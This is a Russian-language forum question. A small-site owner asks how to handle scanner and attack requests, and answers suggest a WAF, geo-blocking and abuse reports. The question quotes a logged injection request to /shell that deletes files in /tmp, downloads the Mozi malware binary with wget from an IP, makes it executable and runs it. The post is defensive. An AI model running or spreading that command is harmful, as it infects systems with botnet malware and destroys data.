@ramiil

Что делать с хакерскими http запросами?

У меня есть небольшой сайт, и на него последнее время начали приходить различные http-запросы не относящиеся к содержимому сайта, например

get wp-login.php
get /gponform/diag_form?images/
get /shell?cd+/tmp;rm+-rf+*;wget+192.168.1.1:8088/mozi.a;chmod+777+mozi.a;/tmp/mozi...


Очевидно, это злоумышленники и их боты, сканящие сайт в поисках уязвимостей. Вопрос - что с ними делать? Я написал скрипт, который банит их в iptables, может есть сайты, которые держат бан-листы или сигнатуры\регекспы для обнаружения злоумышленных запросов?
  • Вопрос задан
  • 377 просмотров
Пригласить эксперта
Ответы на вопрос 4
AleksandrB
@AleksandrB
Совсем недавно вывел "Hello world"
Забить, всех не перебанишь, а если захочешь - забанишь реальных пользаков.
Ну и просто не оставлять подобных уязвимостей.
Ответ написан
@Mnemonic0
WAF - это вам поможет. Баны по ип/регионам это как блокировка /8 сетей при пыпытке заблокировать Телеграм.
Вкратце - прикрываешься CDN (Клаудфронт например) и в нём настраиваешь проверку AWS WAF - 95% всех попыток взлома будет закрыто.
Остальные 5% будет сильно дороже закрыть, всё зависит от денег, которые потеряются от простяо сайта.
Ответ написан
borisdenis
@borisdenis
Ленив и вреден...
Определиться с целевой аудиторией, если это РФ, то доступ из других стран нам не нужен и мы можем смело забанить подсети Америки и т.п..
Как минимум забанить подсети Китая, оттуда постоянно самые неадекватные запросы идут.
Так же можно в бан листы отправить известные выходные ноды тора
Отправить в бан лист сервера Amazon и им подобные.

Объем всякого мусора сократится в разы, главное не забанить нужное)))
Ответ написан
Комментировать
@qid00000000
Мало что знаю, но информацию найду в гугле
1. Проверить, что уязвимости закрыты.
2. Отрепортить владельцу ip о том, что из его сети идёт атака (возможно, хост взломан). Посмотреть владельца ip можно во whois по ip (abuse contact).
3. Забанить ip на неделю.

Это поможет:
1. Не быть взломанным.
2. Принести убытки атакующим: сократить объем атакующих хостов.

Это не поможет:
1. Если взломали самого провайдера (актуально для африканских стран)
2. Если в системе уже сидит дорвей.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы